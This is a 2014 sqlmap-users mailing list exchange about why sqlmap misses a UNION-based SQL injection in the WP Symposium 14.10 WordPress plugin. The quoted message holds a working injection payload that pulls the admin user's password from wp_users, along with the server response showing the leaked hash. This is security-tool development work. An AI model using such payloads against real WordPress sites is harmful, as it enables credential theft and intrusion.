Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
From: Miroslav S. <mir...@gm...> - 2014-12-15 16:54:56
Hi.

I don't see a reason why this form of UNION test would be any different than the regular used by sqlmap. Can you please send me the traffic file for such run (... --flush-session -t traffic.txt) along with console output?

Bye

On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
> Hello!
>
> Playing around with the following vulnerability:
>
> http://www.exploit-db.com/exploits/35505/
>
> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
> result in a response from the server with the hash of the first user:
>
> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>
> However, sqlmap only finds a time based injection. Looking at sqlmap
> through burp, I do see sqlmap doesn't try an injection syntax like the one
> used in the PoC. It may be useful to add a syntax of UNION (SELECT
> CONCAT(blah, blah, blah) FROM blah).
>
> Just a thought!
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website